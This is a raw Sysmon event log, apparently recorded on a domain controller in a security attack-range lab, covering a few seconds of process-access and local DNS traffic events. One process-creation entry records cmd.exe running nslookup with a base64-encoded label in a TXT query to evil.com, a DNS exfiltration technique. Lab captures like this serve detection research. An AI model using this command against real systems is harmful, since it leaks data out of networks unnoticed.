14:16:43.677{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203829Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.677{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203828Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.677{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17CB-629A-CF41-000000005F02}3656C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 354300x8000000000000000203827Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.114{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53045- 10341000x8000000000000000203826Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.677{2E1864BB-17CB-629A-CD41-000000005F02}3881772C:\Windows\system32\cmd.exe{2E1864BB-17CB-629A-CF41-000000005F02}3656C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000203825Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.114{00000000-0000-0000-0000-000000000000}7796<unknown process>-udptruefalse127.0.0.1-53045-false127.0.0.1-53domain 154100x8000000000000000203824Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.687{2E1864BB-17CB-629A-CF41-000000005F02}3656C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17CB-629A-CD41-000000005F02}388C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldajwkc.tmp 2>&1 354300x8000000000000000203823Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.113{00000000-0000-0000-0000-000000000000}7796<unknown process>-udpfalsefalse127.0.0.1-53044-false127.0.0.1-53domain 354300x8000000000000000203822Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.113{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53044- 354300x8000000000000000203821Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.113{00000000-0000-0000-0000-000000000000}7796<unknown process>-udptruefalse127.0.0.1-53044-false127.0.0.1-53domain 354300x8000000000000000203820Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.113{00000000-0000-0000-0000-000000000000}7796<unknown process>-udpfalsefalse127.0.0.1-53043-false127.0.0.1-53domain 354300x8000000000000000203819Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.113{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53043- 354300x8000000000000000203818Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.113{00000000-0000-0000-0000-000000000000}7796<unknown process>-udptruefalse127.0.0.1-53043-false127.0.0.1-53domain 354300x8000000000000000203817Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.978{00000000-0000-0000-0000-000000000000}3336<unknown process>-udpfalsefalse127.0.0.1-53042-false127.0.0.1-53domain 354300x8000000000000000203816Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.978{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53042- 354300x8000000000000000203815Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.978{00000000-0000-0000-0000-000000000000}3336<unknown process>-udptruefalse127.0.0.1-53042-false127.0.0.1-53domain 354300x8000000000000000203814Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.977{00000000-0000-0000-0000-000000000000}3336<unknown process>-udpfalsefalse127.0.0.1-53041-false127.0.0.1-53domain 354300x8000000000000000203813Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.977{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53041- 354300x8000000000000000203812Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.977{00000000-0000-0000-0000-000000000000}3336<unknown process>-udptruefalse127.0.0.1-53041-false127.0.0.1-53domain 354300x8000000000000000203811Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.977{00000000-0000-0000-0000-000000000000}3336<unknown process>-udpfalsefalse127.0.0.1-53040-false127.0.0.1-53domain 354300x8000000000000000203810Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.968{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53040- 354300x8000000000000000203809Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.967{00000000-0000-0000-0000-000000000000}3336<unknown process>-udptruefalse127.0.0.1-53040-false127.0.0.1-53domain 354300x8000000000000000203808Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.842{00000000-0000-0000-0000-000000000000}5432<unknown process>-udpfalsefalse127.0.0.1-53039-false127.0.0.1-53domain 354300x8000000000000000203807Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.842{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53039- 354300x8000000000000000203806Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.841{00000000-0000-0000-0000-000000000000}5432<unknown process>-udptruefalse127.0.0.1-53039-false127.0.0.1-53domain 354300x8000000000000000203805Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.841{00000000-0000-0000-0000-000000000000}5432<unknown process>-udpfalsefalse127.0.0.1-53038-false127.0.0.1-53domain 354300x8000000000000000203804Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.841{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53038- 354300x8000000000000000203803Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.841{00000000-0000-0000-0000-000000000000}5432<unknown process>-udptruefalse127.0.0.1-53038-false127.0.0.1-53domain 354300x8000000000000000203802Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.840{00000000-0000-0000-0000-000000000000}5432<unknown process>-udpfalsefalse127.0.0.1-53037-false127.0.0.1-53domain 354300x8000000000000000203801Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.840{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53037- 354300x8000000000000000203800Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.840{00000000-0000-0000-0000-000000000000}5432<unknown process>-udptruefalse127.0.0.1-53037-false127.0.0.1-53domain 354300x8000000000000000203799Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.701{00000000-0000-0000-0000-000000000000}6388<unknown process>-udpfalsefalse127.0.0.1-53036-false127.0.0.1-53domain 354300x8000000000000000203798Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.701{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53036- 354300x8000000000000000203797Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.701{00000000-0000-0000-0000-000000000000}6388<unknown process>-udptruefalse127.0.0.1-53036-false127.0.0.1-53domain 354300x8000000000000000203796Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.696{00000000-0000-0000-0000-000000000000}6388<unknown process>-udpfalsefalse127.0.0.1-53035-false127.0.0.1-53domain 10341000x8000000000000000203795Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.661{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17CB-629A-CE41-000000005F02}2952C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000203794Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.696{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53035- 10341000x8000000000000000203793Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.661{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17CB-629A-CE41-000000005F02}2952C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000203792Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.695{00000000-0000-0000-0000-000000000000}6388<unknown process>-udptruefalse127.0.0.1-53035-false127.0.0.1-53domain 354300x8000000000000000203791Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.693{00000000-0000-0000-0000-000000000000}6388<unknown process>-udpfalsefalse127.0.0.1-53034-false127.0.0.1-53domain 354300x8000000000000000203790Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.693{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53034- 354300x8000000000000000203789Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.693{00000000-0000-0000-0000-000000000000}6388<unknown process>-udptruefalse127.0.0.1-53034-false127.0.0.1-53domain 354300x8000000000000000203788Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.567{00000000-0000-0000-0000-000000000000}5608<unknown process>-udpfalsefalse127.0.0.1-53033-false127.0.0.1-53domain 354300x8000000000000000203787Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.567{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53033- 354300x8000000000000000203786Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.567{00000000-0000-0000-0000-000000000000}5608<unknown process>-udptruefalse127.0.0.1-53033-false127.0.0.1-53domain 354300x8000000000000000203785Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.567{00000000-0000-0000-0000-000000000000}5608<unknown process>-udpfalsefalse127.0.0.1-53032-false127.0.0.1-53domain 354300x8000000000000000203784Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.567{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53032- 354300x8000000000000000203783Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.567{00000000-0000-0000-0000-000000000000}5608<unknown process>-udptruefalse127.0.0.1-53032-false127.0.0.1-53domain 354300x8000000000000000203782Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.566{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53031- 354300x8000000000000000203781Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.566{00000000-0000-0000-0000-000000000000}5608<unknown process>-udptruefalse127.0.0.1-53031-false127.0.0.1-53domain 354300x8000000000000000203780Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.434{00000000-0000-0000-0000-000000000000}2444<unknown process>-udpfalsefalse127.0.0.1-53030-false127.0.0.1-53domain 10341000x8000000000000000203779Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.661{2E1864BB-17CB-629A-CE41-000000005F02}29526000C:\Windows\system32\conhost.exe{2E1864BB-17CB-629A-CD41-000000005F02}388C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000203778Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.434{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53030- 354300x8000000000000000203777Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.434{00000000-0000-0000-0000-000000000000}2444<unknown process>-udptruefalse127.0.0.1-53030-false127.0.0.1-53domain 354300x8000000000000000203776Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.433{00000000-0000-0000-0000-000000000000}2444<unknown process>-udpfalsefalse127.0.0.1-53029-false127.0.0.1-53domain 354300x8000000000000000203775Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.433{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53029- 354300x8000000000000000203774Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.433{00000000-0000-0000-0000-000000000000}2444<unknown process>-udpfalsefalse127.0.0.1-53028-false127.0.0.1-53domain 354300x8000000000000000203773Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.433{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53028- 354300x8000000000000000203772Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.335{00000000-0000-0000-0000-000000000000}5740<unknown process>-udpfalsefalse127.0.0.1-53027-false127.0.0.1-53domain 354300x8000000000000000203771Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.335{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53027- 354300x8000000000000000203770Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.334{00000000-0000-0000-0000-000000000000}5740<unknown process>-udpfalsefalse127.0.0.1-53026-false127.0.0.1-53domain 354300x8000000000000000203769Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.334{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53026- 354300x8000000000000000203768Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.334{00000000-0000-0000-0000-000000000000}5740<unknown process>-udptruefalse127.0.0.1-53026-false127.0.0.1-53domain 354300x8000000000000000203767Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.334{00000000-0000-0000-0000-000000000000}5740<unknown process>-udpfalsefalse127.0.0.1-53025-false127.0.0.1-53domain 354300x8000000000000000203766Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.332{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53025- 354300x8000000000000000203765Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.332{00000000-0000-0000-0000-000000000000}5740<unknown process>-udptruefalse127.0.0.1-53025-false127.0.0.1-53domain 354300x8000000000000000203764Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.252{00000000-0000-0000-0000-000000000000}7824<unknown process>-udpfalsefalse127.0.0.1-53024-false127.0.0.1-53domain 354300x8000000000000000203763Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.252{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53024- 354300x8000000000000000203762Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.251{00000000-0000-0000-0000-000000000000}7824<unknown process>-udptruefalse127.0.0.1-53024-false127.0.0.1-53domain 354300x8000000000000000203761Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.251{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53023- 354300x8000000000000000203760Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.251{00000000-0000-0000-0000-000000000000}7824<unknown process>-udptruefalse127.0.0.1-53023-false127.0.0.1-53domain 354300x8000000000000000203759Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.251{00000000-0000-0000-0000-000000000000}7824<unknown process>-udpfalsefalse127.0.0.1-53022-false127.0.0.1-53domain 354300x8000000000000000203758Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.251{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53022- 10341000x8000000000000000203757Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.640{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17CB-629A-CE41-000000005F02}2952C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 354300x8000000000000000203756Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.251{00000000-0000-0000-0000-000000000000}7824<unknown process>-udptruefalse127.0.0.1-53022-false127.0.0.1-53domain 354300x8000000000000000203755Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.128{00000000-0000-0000-0000-000000000000}2668<unknown process>-udpfalsefalse127.0.0.1-53021-false127.0.0.1-53domain 354300x8000000000000000203754Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.127{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53021- 354300x8000000000000000203753Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.127{00000000-0000-0000-0000-000000000000}2668<unknown process>-udptruefalse127.0.0.1-53021-false127.0.0.1-53domain 354300x8000000000000000203752Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.127{00000000-0000-0000-0000-000000000000}2668<unknown process>-udpfalsefalse127.0.0.1-53020-false127.0.0.1-53domain 354300x8000000000000000203751Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.127{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53020- 354300x8000000000000000203750Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.127{00000000-0000-0000-0000-000000000000}2668<unknown process>-udptruefalse127.0.0.1-53020-false127.0.0.1-53domain 354300x8000000000000000203749Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.127{00000000-0000-0000-0000-000000000000}2668<unknown process>-udpfalsefalse127.0.0.1-53019-false127.0.0.1-53domain 354300x8000000000000000203748Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.127{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53019- 354300x8000000000000000203747Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.127{00000000-0000-0000-0000-000000000000}2668<unknown process>-udptruefalse127.0.0.1-53019-false127.0.0.1-53domain 10341000x8000000000000000203746Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.640{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203745Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 